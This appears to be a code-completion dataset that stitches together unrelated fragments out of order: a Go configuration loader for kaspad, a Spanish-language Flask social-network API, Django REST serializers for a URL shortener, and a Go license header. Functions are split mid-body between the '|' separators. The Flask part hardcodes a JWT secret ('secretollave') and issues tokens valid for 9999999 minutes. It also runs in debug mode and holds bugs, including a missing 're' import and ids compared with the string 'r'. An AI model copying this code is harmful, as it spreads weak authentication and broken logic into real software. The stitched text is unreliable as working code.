// Expand initial ~ to OS specific home directory.
if strings.HasPrefix(path, "~") {
homeDir := filepath.Dir(DefaultAppDir)
path = strings.Replace(path, "~", homeDir, 1)
}
// NOTE: The os.ExpandEnv doesn't work with Windows-style %VARIABLE%,
// but they variables can still be expanded via POSIX-style $VARIABLE.
return filepath.Clean(os.ExpandEnv(path))
}
// newConfigParser returns a new command line flags parser.
func newConfigParser(cfgFlags *Flags, options flags.Options) *flags.Parser {
parser := flags.NewParser(cfgFlags, options)
if runtime.GOOS == "windows" {
parser.AddGroup("Service Options", "Service Options", cfgFlags.ServiceOptions)
}
return parser
}
func defaultFlags() *Flags {
return &Flags{
ConfigFile: defaultConfigFile,
LogLevel: defaultLogLevel,
TargetOutboundPeers: defaultTargetOutboundPeers,
MaxInboundPeers: defaultMaxInboundPeers,
BanDuration: defaultBanDuration,
BanThreshold: defaultBanThreshold,
RPCMaxClients: defaultMaxRPCClients,
RPCMaxWebsockets: defaultMaxRPCWebsockets,
RPCMaxConcurrentReqs: defaultMaxRPCConcurrentReqs,
AppDir: defaultDataDir,
RPCKey: defaultRPCKeyFile,
RPCCert: defaultRPCCertFile,
BlockMaxMass: defaultBlockMaxMass,
MaxOrphanTxs: defaultMaxOrphanTransactions,
SigCacheMaxSize: defaultSigCacheMaxSize,
MinRelayTxFee: defaultMinRelayTxFee,
MaxUTXOCacheSize: defaultMaxUTXOCacheSize,
ServiceOptions: &ServiceOptions{},
}
}
// DefaultConfig returns the default kaspad configuration
func DefaultConfig() *Config {
config := &Config{Flags: defaultFlags()}
config.NetworkFlags.ActiveNetParams = &dagconfig.MainnetParams
return config
}
// LoadConfig initializes and parses the config using a config file and command
// line options.
//
// The configuration proceeds as follows:
// 1) Start with a default config with sane settings
// 2) Pre-parse the command line to check for an alternative config file
// 3) Load configuration file overwriting defaults with any specified options
// 4) Parse CLI options and overwrite/add any specified options
//
// The above results in kaspad functioning properly without any config settings
// while still allowing the user to override settings with config files and
// command line options. Command line options always take precedence.
func LoadConfig() (*Config, error) {
cfgFlags := defaultFlags()
// Pre-parse the command line options to see if an alternative config
// file or the version flag was specified. Any errors aside from the
// help message error can be ignored here since they will be caught by
// the final parse below.
preCfg := cfgFlags
preParser := newConfigParser(preCfg, flags.HelpFlag)
_, err := preParser.Parse()
if err != nil {
var flagsErr *flags.Error
if ok := errors.As(err, &flagsErr); ok && flagsErr.Type == flags.ErrHelp {
return nil, err
}
}
appName := filepath.Base(os.Args[0])
appName = strings.TrimSuffix(appName, filepath.Ext(appName))
usageMessage := fmt.Sprintf("Use %s -h to show usage", appName)
// Show the version and exit if the version flag was specified.
if preCfg.ShowVersion {
fmt.Println(appName, "version", version.Version())
os.Exit(0)
}
// Load additional config from file.
var configFileError error
parser := newConfigParser(cfgFlags, flags.Default)
cfg := &Config{
Flags: cfgFlags,
}
if !preCfg.Simnet || preCfg.ConfigFile != defaultConfigFile {
if _, err := os.Stat(preCfg.ConfigFile); os.IsNotExist(err) {
err := createDefaultConfigFile(preCfg.ConfigFile)
if err != nil {
return nil, errors.Wrap(err, "Error creating a default config file")
}
}
err := flags.NewIniParser(parser).ParseFile(preCfg.ConfigFile)
if err != nil {
if pErr := &(os.PathError{}); !errors.As(err, &pErr) {
return nil, errors.Wrapf(err, "Error parsing config file: %s\n\n%s", err, usageMessage)
}
configFileError = err
}
}
// Parse command line options again to ensure they take precedence.
_, err = parser.Parse()
if err != nil {
var flagsErr *flags.Error
if ok := errors.As(err, &flagsErr); !ok || flagsErr.Type != flags.ErrHelp {
return nil, errors.Wrapf(err, "Error parsing command line arguments: %s\n\n%s", err, usageMessage)
}
return nil, err
}
// Create the home directory if it doesn't already exist.
funcName := "loadConfig"
err = os.MkdirAll(DefaultAppDir, 0700)
if err != nil {
// Show a nicer error message if it's because a symlink is
// linked to a directory that does not exist (probably because
// it's not mounted).
var e *os.PathError
if ok := errors.As(err, &e); ok && os.IsExist(err) {
if link, lerr := os.Readlink(e.Path); lerr == nil {
str := "is symlink %s -> %s mounted?"
err = errors.Errorf(str, e.Path, link)
}
}
str := "%s: Failed to create home directory: %s"
err := errors.Errorf(str, funcName, err)
return nil, err
}
err = cfg.ResolveNetwork(parser)
if err != nil {
return nil, err
}
// Set the default policy for relaying non-standard transactions
// according to the default of the active network. The set
// configuration value takes precedence over the default value for the
// selected network.
relayNonStd := cfg.NetParams().RelayNonStdTxs
switch {
case cfg.RelayNonStd && cfg.RejectNonStd:
str := "%s: rejectnonstd and relaynonstd cannot be used " +
"together -- choose only one"
err := errors.Errorf(str, funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
case cfg.RejectNonStd:
relayNonStd = false
case cfg.RelayNonStd:
relayNonStd = true
}
cfg.RelayNonStd = relayNonStd
cfg.AppDir = cleanAndExpandPath(cfg.AppDir)
// Append the network type to the app directory so it is "namespaced"
// per network.
// All data is specific to a network, so namespacing the data directory
// means each individual piece of serialized data does not have to
// worry about changing names per network and such.
cfg.AppDir = filepath.Join(cfg.AppDir, cfg.NetParams().Name)
// Logs directory is usually under the home directory, unless otherwise specified
if cfg.LogDir == "" {
cfg.LogDir = filepath.Join(cfg.AppDir, defaultLogDirname)
}
cfg.LogDir = cleanAndExpandPath(cfg.LogDir)
// Special show command to list supported subsystems and exit.
if cfg.LogLevel == "show" {
fmt.Println("Supported subsystems", logger.SupportedSubsystems())
os.Exit(0)
}
// Initialize log rotation. After log rotation has been initialized, the
// logger variables may be used.
logger.InitLog(filepath.Join(cfg.LogDir, defaultLogFilename), filepath.Join(cfg.LogDir, defaultErrLogFilename))
// Parse, validate, and set debug log level(s).
if err := logger.ParseAndSetLogLevels(cfg.LogLevel); err != nil {
err := errors.Errorf("%s: %s", funcName, err.Error())
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Validate profile port number
if cfg.Profile != "" {
profilePort, err := strconv.Atoi(cfg.Profile)
if err != nil || profilePort < 1024 || profilePort > 65535 {
str := "%s: The profile port must be between 1024 and 65535"
err := errors.Errorf(str, funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
}
// Don't allow ban durations that are too short.
if cfg.BanDuration < time.Second {
str := "%s: The banduration option may not be less than 1s -- parsed [%s]"
err := errors.Errorf(str, funcName, cfg.BanDuration)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Validate any given whitelisted IP addresses and networks.
if len(cfg.Whitelists) > 0 {
var ip net.IP
cfg.Whitelists = make([]*net.IPNet, 0, len(cfg.Flags.Whitelists))
for _, addr := range cfg.Flags.Whitelists {
_, ipnet, err := net.ParseCIDR(addr)
if err != nil {
ip = net.ParseIP(addr)
if ip == nil {
str := "%s: The whitelist value of '%s' is invalid"
err = errors.Errorf(str, funcName, addr)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
var bits int
if ip.To4() == nil {
// IPv6
bits = 128
} else {
bits = 32
}
ipnet = &net.IPNet{
IP: ip,
Mask: net.CIDRMask(bits, bits),
}
}
cfg.Whitelists = append(cfg.Whitelists, ipnet)
}
}
// --addPeer and --connect do not mix.
if len(cfg.AddPeers) > 0 && len(cfg.ConnectPeers) > 0 {
str := "%s: the --addpeer and --connect options can not be " +
"mixed"
err := errors.Errorf(str, funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// --proxy or --connect without --listen disables listening.
if (cfg.Proxy != "" || len(cfg.ConnectPeers) > 0) &&
len(cfg.Listeners) == 0 {
cfg.DisableListen = true
}
// ConnectPeers means no DNS seeding and no outbound peers
if len(cfg.ConnectPeers) > 0 {
cfg.DisableDNSSeed = true
cfg.TargetOutboundPeers = 0
}
// Add the default listener if none were specified. The default
// listener is all addresses on the listen port for the network
// we are to connect to.
if len(cfg.Listeners) == 0 {
cfg.Listeners = []string{
net.JoinHostPort("", cfg.NetParams().DefaultPort),
}
}
if cfg.DisableRPC {
log.Infof("RPC service is disabled")
}
// Add the default RPC listener if none were specified. The default
// RPC listener is all addresses on the RPC listen port for the
// network we are to connect to.
if !cfg.DisableRPC && len(cfg.RPCListeners) == 0 {
cfg.RPCListeners = []string{
net.JoinHostPort("", cfg.NetParams().RPCPort),
}
}
if cfg.RPCMaxConcurrentReqs < 0 {
str := "%s: The rpcmaxwebsocketconcurrentrequests option may " +
"not be less than 0 -- parsed [%d]"
err := errors.Errorf(str, funcName, cfg.RPCMaxConcurrentReqs)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Validate the the minrelaytxfee.
cfg.MinRelayTxFee, err = util.NewAmount(cfg.Flags.MinRelayTxFee)
if err != nil {
str := "%s: invalid minrelaytxfee: %s"
err := errors.Errorf(str, funcName, err)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Disallow 0 and negative min tx fees.
if cfg.MinRelayTxFee == 0 {
str := "%s: The minrelaytxfee option must be greater than 0 -- parsed [%d]"
err := errors.Errorf(str, funcName, cfg.MinRelayTxFee)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Limit the max block mass to a sane value.
if cfg.BlockMaxMass < blockMaxMassMin || cfg.BlockMaxMass >
blockMaxMassMax {
str := "%s: The blockmaxmass option must be in between %d " +
"and %d -- parsed [%d]"
err := errors.Errorf(str, funcName, blockMaxMassMin,
blockMaxMassMax, cfg.BlockMaxMass)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Look for illegal characters in the user agent comments.
for _, uaComment := range cfg.UserAgentComments {
if strings.ContainsAny(uaComment, "/:()") {
err := errors.Errorf("%s: The following characters must not "+
"appear in user agent comments: '/', ':', '(', ')'",
funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
}
// Add default port to all listener addresses if needed and remove
// duplicate addresses.
cfg.Listeners, err = network.NormalizeAddresses(cfg.Listeners,
cfg.NetParams().DefaultPort)
if err != nil {
return nil, err
}
// Add default port to all rpc listener addresses if needed and remove
// duplicate addresses.
cfg.RPCListeners, err = network.NormalizeAddresses(cfg.RPCListeners,
cfg.NetParams().RPCPort)
if err != nil {
return nil, err
}
// Disallow --addpeer and --connect used together
if len(cfg.AddPeers) > 0 && len(cfg.ConnectPeers) > 0 {
str := "%s: --addpeer and --connect can not be used together"
err := errors.Errorf(str, funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Add default port to all added peer addresses if needed and remove
// duplicate addresses.
cfg.AddPeers, err = network.NormalizeAddresses(cfg.AddPeers,
cfg.NetParams().DefaultPort)
if err != nil {
return nil, err
}
cfg.ConnectPeers, err = network.NormalizeAddresses(cfg.ConnectPeers,
cfg.NetParams().DefaultPort)
if err != nil {
return nil, err
}
// Setup dial and DNS resolution (lookup) functions depending on the
// specified options. The default is to use the standard
// net.DialTimeout function as well as the system DNS resolver. When a
// proxy is specified, the dial function is set to the proxy specific
// dial function.
cfg.Dial = net.DialTimeout
cfg.Lookup = net.LookupIP
if cfg.Proxy != "" {
_, _, err := net.SplitHostPort(cfg.Proxy)
if err != nil {
str := "%s: Proxy address '%s' is invalid: %s"
err := errors.Errorf(str, funcName, cfg.Proxy, err)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
proxy := &socks.Proxy{
Addr: cfg.Proxy,
Username: cfg.ProxyUser,
Password: cfg.ProxyPass,
}
cfg.Dial = proxy.DialTimeout
}
// Warn about missing config file only after all other configuration is
// done. This prevents the warning on help messages and invalid
// options. Note this should go directly before the return.
if configFileError != nil {
log.Warnf("%s", configFileError)
}
return cfg, nil
}
// createDefaultConfig copies the file sample-kaspad.conf to the given destination path,
// and populates it with some randomly generated RPC username and password.
func createDefaultConfigFile(destinationPath string) error {
// Create the destination directory if it does not exists
err := os.MkdirAll(filepath.Dir(destinationPath), 0700)
if err != nil {
return err
}
dest, err := os.OpenFile(destinationPath,
os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600)
if err != nil {
return err
}
defer dest.Close()
_, err = dest.WriteString(sampleConfig)
return err
}
|
cleanAndExpandPath
|
QkLc.py
|
# from flask import Flask, Blueprint
# from flask_sqlalchemy import SQLAlchemy
# from flask_login import LoginManager
# import os
from flask import Flask, jsonify, request, make_response, redirect, url_for
import jwt
import datetime
import os
from functools import wraps
from flask_sqlalchemy import SQLAlchemy
import uuid
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
from sqlalchemy import select
from flask_migrate import Migrate, migrate
from flask_cors import CORS
from sqlalchemy import inspect
from sqlalchemy import Table, Column, MetaData, Integer, Computed
from numpy import array
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secretollave'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///todo.db'
ABSOLUTE_PATH_TO_YOUR_FOLDER ='/home/dani/flask/static/fotosPerfil'
ABSOLUTE_PATH_TO_YOUR_PDF_FOLDER ='/home/dani/flask/static/pdf'
CORS(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
# Models
class Usuario(db.Model):
nick = db.Column(db.String(20), primary_key=True)
Nombre_de_usuario = db.Column(db.String(50))
password = db.Column(db.String(50))
e_mail = db.Column(db.String(50), unique=True, nullable=False)
descripcion = db.Column(db.String(1000))
link = db.Column(db.String(200))
foto_de_perfil = db.Column(db.String(400))
class Sigue(db.Model):
#id = db.Column(db.Integer, primary_key=True )
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
Usuario_Nickb = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Chat(db.Model):
#Column('timestamp', TIMESTAMP(timezone=False), nullable=False, default=datetime.now())
timestamp = db.Column(db.TIMESTAMP, nullable=False,
server_default=db.func.now(),
onupdate=db.func.now())
mensaje = db.Column(db.String(1000))
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
Usuario_Nickb = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Publicacion(db.Model):
id = db.Column(Integer,primary_key=True)
#id = db.Sequence('id', start=1, increment=1)
descripcion = db.Column(db.String(1000))
#Column('timestamp', TIMESTAMP(timezone=False), nullable=False, default=datetime.now())
timestamp = db.Column(db.TIMESTAMP, nullable=False,
server_default=db.func.now(),
onupdate=db.func.now())
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'))
class Propia(db.Model):
pdf = db.Column(db.String(400))
id = db.Column(db.String(20), db.ForeignKey('publicacion.id'),primary_key=True)
class Recomendacion(db.Model):
link = db.Column(db.String(200),nullable=False)
titulo = db.Column(db.String(200),nullable=False)
autor = db.Column(db.String(200),nullable=False)
id = db.Column(db.String(20), db.ForeignKey('publicacion.id'),primary_key=True)
class Tematica(db.Model):
tema = db.Column(db.String(50), primary_key=True )
class Notificaciones(db.Model):
id = db.Column(db.Integer, primary_key=True )
fecha = db.Column(db.Date)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Prefiere(db.Model):
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
tema = db.Column(db.String(50), db.ForeignKey('tematica.tema'),primary_key=True)
class Trata_pub_del_tema(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
tema = db.Column(db.String(50), db.ForeignKey('tematica.tema'),primary_key=True)
class Gusta(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Comenta(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
comentario = db.Column(db.String(1000))
class Guarda(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Trata(db.Model):
id_publi = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
id_notif = db.Column(db.String(20), db.ForeignKey('notificaciones.id'),primary_key=True)
class Genera(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
#token = request.args.get('token') #http://127.0.0.1:5000/route?token=djsnvidnoffofn
#data = request.get_json()
token = request.headers['token']
#token = data['token']
if not token:
return jsonify({'error': 'Token no existe'}), 403
try:
data = jwt.decode(token, app.config['SECRET_KEY'])
current_user = Usuario.query.filter_by(nick=data['nick']).first()
current_user = data['nick']
except:
return jsonify({'error': 'Token no valido'}), 403
return f(current_user,*args, **kwargs)
return decorated
def token_required_id(f):
@wraps(f)
def decorated(*args, **kwargs):
#token = request.args.get('token') #http://127.0.0.1:5000/route?token=djsnvidnoffofn
#data = request.get_json()
token = request.headers['token']
#token = data['token']
if not token:
return jsonify({'error': 'Token no existe'}), 403
try:
data = jwt.decode(token, app.config['SECRET_KEY'])
current_user = Usuario.query.filter_by(nick=data['nick']).first()
current_user = data['nick']
current_id = Publicacion.query.filter_by(id=data['id']).first()
_id = data['id']
except:
return jsonify({'error': 'Token no valido'}), 403
return f(current_user,_id,*args, **kwargs)
return decorated
@app.route('/unprotected')
def unprotected():
return jsonify({'message': 'Puede entrar tol mundo'})
@app.route('/protected')
@token_required
def protected(current_user):
print(current_user)
return jsonify({'message': 'Puedes entrar si puedes'})
# Ruta para el login
@app.route('/register', methods=['POST'])
def add_data():
data= request.get_json()
#nick = request.form.get("nick")
#password = request.form.get("password")
#e_mail = request.form.get("e_mail")
user = Usuario.query.filter_by(e_mail=data['e_mail']).first()
nick = Usuario.query.filter_by(nick=data['nick']).first()
if user: # si esto devuelve algo entonces el email existe
return jsonify({'error': 'Existe correo'}) #json diciendo error existe email
if nick:
return jsonify({'error': 'Existe nick'})
#if (check_email(e_mail) == True and check_password(data['password']) == True ):
register = Usuario(nick=data['nick'],password=generate_password_hash(data['password']), e_mail=data['e_mail'],foto_de_perfil="platon.jpg")
db.session.add(register)
db.session.commit()
token = jwt.encode({'nick' : data['nick'], 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/login', methods=['POST'])
def login():
# auth = request.authorization #new ESTO SI LO HACES CON AUTH
data= request.get_json()
if '@' in data['nickOcorreo']:
user = Usuario.query.filter_by(e_mail=data['nickOcorreo']).first()
else:
user = Usuario.query.filter_by(nick=data['nickOcorreo']).first()
if not user:
return jsonify({'error': 'No existe ese usuario'})#error mal user
if not check_password_hash(user.password, data['password']):
return jsonify({'error': 'Mal contraseña'}) #error mala contraseña
token = jwt.encode({'nick' : data['nickOcorreo'], 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=9999999)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/editarPerfil', methods=['GET'])
@token_required
def editarPerfilget(current_user):
s = select([Usuario.Nombre_de_usuario, Usuario.descripcion,Usuario.link, Usuario.foto_de_perfil]).where((Usuario.nick == current_user))
result = db.session.execute(s)
seguidos= db.session.query(Sigue).filter(Sigue.Usuario_Nicka == current_user ).count()
seguidores= db.session.query(Sigue).filter(Sigue.Usuario_Nickb == current_user ).count()
nposts= db.session.query(Publicacion).filter(Publicacion.Usuario_Nicka == current_user ).count()
tema = select([Prefiere.tema]).where((Prefiere.Usuario_Nicka == current_user))
temas = db.session.execute(tema)
vector = []
for row in temas:
vector += row
for row in result:
fila = {
"nick": current_user,
"nombre_de_usuario":row[0],
"descripcion":row[1],
"link":row[2],
"foto_de_perfil": 'http://51.255.50.207:5000/display/' + row[3],
"nsiguiendo": seguidos,
"nseguidores": seguidores,
"nposts": nposts,
"tematicas": vector
#"foto_de_perfil" :url_for('static', filename='fotosPerfil/' + row[3])
}
return fila
@app.route('/display/<filename>')
def foto(filename):
return redirect(url_for('static', filename='fotosPerfil/' + filename),code = 301)
@app.route('/editarPerfil', methods=['POST'])
@token_required
def editarPerfilpost(current_user):
data= request.get_json()
user = Usuario.query.filter_by(nick=current_user).first()
user.Nombre_de_usuario = data['nombre_de_usuario']
print(data['nombre_de_usuario'])
print(data['descripcion'])
print(data['link'])
print(data['tematicas'])
user.descripcion = data['descripcion']
user.link = data['link']
tematicas = data['tematicas']
for temas in tematicas:
tema = Prefiere.query.filter_by(tema=temas).first()
if not tema:
tema = Prefiere(Usuario_Nicka=current_user, tema = temas)
db.session.add(tema)
#db.session.commit()
#cambia_foto
db.session.commit()
token = jwt.encode({'nick' : current_user, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/actualizarImagen', methods=['POST'])
@token_required
def actualizarImagen(current_user):
user = Usuario.query.filter_by(nick=current_user).first()
if request.files['nueva_foto'] is not None: #data['cambia_foto']:
file = request.files['nueva_foto']
print(request.files['nueva_foto'])
filename = secure_filename(file.filename)
file.save(os.path.join(ABSOLUTE_PATH_TO_YOUR_FOLDER, filename))
user.foto_de_perfil = filename
db.session.commit()
token = jwt.encode({'nick' : current_user, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/subirPost', methods=['POST'])
@token_required
def subirPost(current_user):
data= request.get_json()
publicacion = Publicacion(descripcion=data['descripcion'],Usuario_Nicka=current_user) #coger id
db.session.add(publicacion)
db.session.commit()
tematicas = data['tematicas']
for temas in tematicas:
temita = Tematica.query.filter_by(tema=temas).first()
if temita:
nuevo = Trata_pub_del_tema(id=publicacion.id, tema = temita.tema)
db.session.add(nuevo)
db.session.commit()
if (data['tipo']=="1"): # articulo
return jsonify({'id' : publicacion.id})
#guardarPDF(request.files['pdf'], publicacion.id)
elif(data['tipo']=="2"): # recomendacion
recomendacion = Recomendacion(link=data['link'],titulo=data['titulo'], autor = data['autor'], id = publicacion.id)
db.session.add(recomendacion)
db.session.commit()
token = jwt.encode({'nick' : current_user, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/subirPdf', methods=['POST'])
@token_required
def guardarPDF(current_user):
_id=request.headers['id']
propia = Propia( id = _id)
db.session.add(propia)
db.session.commit()
propia = Propia.query.filter_by(id=_id).first()
if request.files['pdf'] is not None:
file = request.files['pdf']
#print(pdf)
filename = secure_filename(file.filename)
file.save(os.path.join(ABSOLUTE_PATH_TO_YOUR_PDF_FOLDER, filename))
propia.pdf = filename
db.session.add(propia)
db.session.commit()
else:
print("pdf nulisimo")
token = jwt.encode({'nick' : current_user, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/getPostsPropios', methods=['GET'])
@token_required
def getPostsPropios(current_user):
data= request.get_json()
x = select([Usuario.Nombre_de_usuario]).where((Usuario.nick == current_user))
resultb = db.session.execute(x)
Nombre_de_usuario = ""
for b in resultb:
Nombre_de_usuario=b.Nombre_de_usuario
id = select([Publicacion.id]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
descripcion = select( [Publicacion.descripcion]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
|
resultsss = db.session.execute(timestamp)
vector0 = []
vector1 = []
vector2 = []
Gustas = []
Comentarios= []
Guardados= []
for r in results:
#print(str(r))
vector0 += r
Gustas += str(db.session.query(Gusta).filter(Gusta.Usuario_Nicka == current_user, Gusta.id == 'r' ).count())
Comentarios += str(db.session.query(Comenta).filter(Comenta.Usuario_Nicka == current_user, Comenta.id == 'r' ).count())
Guardados += str(db.session.query(Guarda).filter(Guarda.Usuario_Nicka == current_user, Guarda.id == 'r').count())
for r in resultss:
vector1 += r
for r in resultsss:
vector2 += r
vector3 = []
vector4 = []
vector5 = []
for r in vector0:
link = select([Recomendacion.link]).where((Recomendacion.id == r))
titulo = select([Recomendacion.titulo]).where((Recomendacion.id == r))
autor = select([Recomendacion.autor]).where((Recomendacion.id == r))
resulta = db.session.execute(link)
resultaa = db.session.execute(titulo)
resultaaa = db.session.execute(autor)
for a in resulta:
vector3 +=a
for a in resultaa:
vector4 +=a
for a in resultaaa:
vector5 +=a
fila = {
"id": r.id,
"nick": current_user,
"descripcion":r.descripcion,
"timestamp":r.timestamp,
"pdf": 'http://51.255.50.207:5000/display2/' + a.pdf,
"nlikes": Gustas,
"ncomentarios": Comentarios,
"nguardados": Guardados,
"usuario": resulta.nombre_de_usuario
}
fila = {
"id": vector0,
"link": vector3,
"titulo": vector4,
"autor": vector5,
"nick": current_user,
"descripcion": vector1,
"timestamp": vector2,
"nlikes": Gustas,
"ncomentarios": Comentarios,
"nguardados": Guardados,
"usuario": Nombre_de_usuario,
#"likemio",
#"guardadomio"
}
return fila
@app.route('/display2/<filename>')
def pdf(filename):
return redirect(url_for('static', filename='pdf/' + filename),code = 301)
@app.route('/getPostsRecomendados', methods=['GET'])
@token_required
def getPostsRecomendados(current_user):
data= request.get_json()
x = select([Usuario.Nombre_de_usuario]).where((Usuario.nick == current_user))
resultb = db.session.execute(x)
Nombre_de_usuario = ""
for b in resultb:
Nombre_de_usuario=b.Nombre_de_usuario
id = select([Publicacion.id]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
descripcion = select( [Publicacion.descripcion]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
timestamp = select([Publicacion.timestamp]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
results = db.session.execute(id)
resultss = db.session.execute(descripcion)
resultsss = db.session.execute(timestamp)
vector0 = []
vector1 = []
vector2 = []
Gustas = []
Comentarios= []
Guardados= []
for r in results:
#print(str(r))
vector0 += r
Gustas += str(db.session.query(Gusta).filter(Gusta.Usuario_Nicka == current_user, Gusta.id == 'r' ).count())
Comentarios += str(db.session.query(Comenta).filter(Comenta.Usuario_Nicka == current_user, Comenta.id == 'r' ).count())
Guardados += str(db.session.query(Guarda).filter(Guarda.Usuario_Nicka == current_user, Guarda.id == 'r').count())
for r in resultss:
vector1 += r
for r in resultsss:
vector2 += r
vector3 = []
vector4 = []
vector5 = []
for r in vector0:
link = select([Recomendacion.link]).where((Recomendacion.id == r))
titulo = select([Recomendacion.titulo]).where((Recomendacion.id == r))
autor = select([Recomendacion.autor]).where((Recomendacion.id == r))
resulta = db.session.execute(link)
resultaa = db.session.execute(titulo)
resultaaa = db.session.execute(autor)
for a in resulta:
vector3 +=a
for a in resultaa:
vector4 +=a
for a in resultaaa:
vector5 +=a
fila = {
"id": vector0,
"link": vector3,
"titulo": vector4,
"autor": vector5,
"nick": current_user,
"descripcion": vector1,
"timestamp": vector2,
"nlikes": Gustas,
"ncomentarios": Comentarios,
"nguardados": Guardados,
"usuario": Nombre_de_usuario,
#"likemio",
#"guardadomio"
}
return fila
def check_email(email):
regex = '^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$'
if(re.search(regex,email)):
return True
else:
return False
# Contraseñas de entre 8 y 32 carácteres.
def check_password(password):
regex = '^(?=.*[0-9])(?=.*[a-z])(?=.*[A-Z])(?=.*[*.!@$%^&(){}[]:;<>,.?/~_+-=|\]).{8,32}$'
if(re.search(regex,password)):
return True
else:
return False
if __name__ == '__main__':
app.run(debug=True)
|
timestamp = select([Publicacion.timestamp]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
results = db.session.execute(id)
resultss = db.session.execute(descripcion)
|
serializers.py
|
from rest_framework import serializers
from django.core.validators import URLValidator
from django.core.exceptions import ValidationError
from .models import User
from .models import ShortenedUrl
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "email", "username", "fullname", "password")
extra_kwargs = {"password": {"write_only": True}}
def create(self, validated_data):
user = User.objects.create_user(validated_data['email'], validated_data['username'],
validated_data['fullname'], validated_data['password'])
|
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "email", "username", "fullname")
class ShortenBodySerializer(serializers.ModelSerializer):
class Meta:
model = ShortenedUrl
fields = ("id", "original_url", "shortened_url")
def validate(self, data):
url_validator = URLValidator()
if len(data["shortened_url"]) > 10:
raise serializers.ValidationError
try:
url_validator(data["original_url"])
except ValidationError:
raise serializers.ValidationError("Invalid URL to Shorten")
return data
class ShortenUrlSerializer(serializers.ModelSerializer):
class Meta:
model = ShortenedUrl
fields = ("id", "user", "original_url", "shortened_url")
|
return user
|
replicaset.go
|
/*
Copyright The Stash Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package workloads
import (
|
"context"
"stash.appscode.dev/apimachinery/apis"
